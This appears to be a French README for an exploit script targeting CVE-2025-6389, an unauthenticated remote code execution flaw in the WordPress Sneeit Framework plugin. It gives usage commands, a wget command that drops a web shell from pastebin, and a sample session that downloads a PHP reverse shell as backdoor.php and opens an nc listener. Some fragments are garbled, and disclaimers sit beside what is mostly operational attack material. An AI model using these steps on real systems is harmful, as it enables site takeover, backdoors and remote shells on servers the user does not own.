
CVE-2025-6389
wp_vul_theme
CVE-2025-6389 est une vulnérabilité Critique (CVSS 9.8) dans le plugin WordPress Sneeit Framework (≤ 8.3), largement utilisé par des thèmes populaires. Elle permet l'exécution de code à distance sans authentification — la classe de vulnérabilités web la plus dangereuse.
# Installer les dépendances
pip3 install requests colorama
# Vérifier la vulnérabilité + obtenir un shell interactif
python3 CVE-2025-6389.py https://cible.com
# Exécuter une seule commande
python3 CVE-2025-6389.py https://cible.com "wget https://pastebin.com/raw/abc123 -O /var/www/html/shell.php"
assert + die)Utilisez ceci uniquement sur des cibles que vous êtes officiellement autorisé à tester (périmètre clair + RoE).
La vulnérabilité est encore massivement exploitée dans la nature en ce moment.
Voici exactement ce que vous verrez dans votre terminal lorsque l'exploit fonctionne réellement (exploitation réussie à 100% de CVE-2025-6389 sur une cible vulnérable exécutant Sneeit Framework ≤ 8.3) :
[+] VULNÉRABLE ! RCE confirmé !
[+] Sortie :
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head><title>phpinfo()</title>…
<h1>PHP Version 8.1.29</h1>
… (page phpinfo() complète sur des milliers de lignes)
RCE $> whoami
[+] Sortie :
www-data
RCE $> id
[+] Sortie :
uid=33(www-data) gid=33(www-data) groups=33(www-data)
RCE $> uname -a
[+] Sortie :
Linux ip-172-31-23-45 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 20 2025 x86_64 GNU/Linux
RCE $> wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O /var/www/html/backdoor.php
[+] Sortie :
--2025-11-25 23:11:45-- https://raw.githubusercontent.com/…
Longueur : 5494 (5.4K) [text/plain]
Sauvegarde dans : '/var/www/html/backdoor.php'
backdoor.php 100%[===================>] 5.37K --.-KB/s dans 0.001s
Ensuite, sur votre propre machine :
nc -lvnp 4444
→ Vous obtenez instantanément un reverse shell totalement interactif en tant que www-data.
[-] Non vulnérable ou bloqué (statut : 200)
[+] Sortie :
(rien / réponse vide / réponse normale AJAX WordPress / 403 / 500 sans sortie)
Vous savez que ça a fonctionné lorsque vous voyez l'un de ces éléments :
C'est tout. Si vous obtenez l'un des éléments ci-dessus → RCE non authentifiée totale obtenue.
Collez votre sortie exacte ici si vous voulez que je confirme à 100% si cela a fonctionné ou non.
sneeit_articles_pagination_callback()call_user_func() → exécution de code arbitraireCes informations sont fournies à des fins défensives et éducatives uniquement 🛡️. Ne les utilisez pas pour exploiter des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de test 🚫. Respectez toujours les directives légales et éthiques lorsque vous travaillez avec des vulnérabilités de sécurité ⚖️✨